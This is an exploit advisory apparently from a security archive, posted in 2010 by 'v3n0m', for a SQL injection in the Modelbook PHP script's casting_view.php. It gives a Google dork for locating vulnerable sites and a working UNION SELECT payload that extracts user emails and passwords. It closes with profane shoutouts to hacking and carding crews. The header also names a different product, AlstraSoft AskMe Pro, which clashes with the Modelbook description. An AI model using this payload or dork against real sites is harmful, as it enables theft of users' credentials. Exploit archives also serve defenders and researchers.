Modelbook SQL Injection

Modelbook SQL Injection: Posted Apr 29, 2010; Authored by v3n0m; Modelbook suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 962fdcb917cafd16f27f55d4b260d5158b4fc7c58e1cdcda5711fd68f7eb7554; Download | Favorite | View

Modelbook SQL Injection

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
                    .WEB.ID
-----------------------------------------------------------------------
       Modelbook (casting_view.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author    : v3n0m
Site      : http://yogyacarderlink.web.id/
Date    : April, 29-2010
Location  : Jakarta, Indonesia
Time Zone  : GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application  : AlstraSoft AskMe Pro
Vendor    : http://www.rocky.nu/
Price    : $100.00 USD
Google Dork  : allinurl:casting_view.php?adnum=
Overview  :

Modelbook is a full featured web community script. A very extensive and 
powerful web application written in PHP. 100% Open Source Code, no Encryption.
----------------------------------------------------------------

Exploit:
~~~~~~~

-9999+union+all+select+1,group_concat(email,char(58),pass)v3n0m,3,4,5,6,7,8,9,10+from+users--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/casting_view.php?adnum=[SQLi]

----------------------------------------------------------------

Shoutz:
~~~~

- 'malingsial banyak cakap, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (baru tau gw ur klo lo ternyata pernah curhat sambil nangis² bruakakaka)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- Chip D3 Bi0s & LatinHackTeam (Good Job & Good Research Brotha ;)
- elicha cristia [ luv You...luv You...luv You... :) ]
- N.O.C & Technical Support @office "except ahong (fuck you off)"
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
    http://v3n0m.blogdetik.com/
    http://elich4.blogspot.com/ << Update donk >_<

---------------------------[EOF]--------------------------------

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Modelbook SQL Injection

Modelbook SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Modelbook SQL Injection

Share This

Modelbook SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems